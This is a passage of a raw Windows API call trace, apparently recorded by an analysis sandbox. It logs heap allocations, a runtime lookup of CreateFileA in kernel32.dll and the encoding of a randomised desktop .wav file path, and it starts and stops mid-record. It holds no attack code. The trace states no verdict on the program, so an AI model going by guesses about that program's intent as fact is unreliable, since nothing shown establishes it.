dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.601] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0031.601] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.601] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0031.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0031.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.601] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0031.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0031.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0031.601] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0031.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbb0 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0031.602] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0031.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.602] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0031.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.603] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0031.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0031.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0031.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0031.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0031.604] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.604] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.605] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.606] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0031.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889ac0 [0031.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889ac0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0031.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.607] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0031.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ac0 [0031.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889ac0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0031.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.607] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0031.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0031.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0031.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav", cchWideChar=93, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0031.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5d) returned 0x87aa40 [0031.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav", cchWideChar=93, lpMultiByteStr=0x87aa40, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\xLjsIUwe53RPsLj_a.wav", lpUsedDefaultChar=0x0) returned 93 [0031.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0031.608] HeapFree (in: 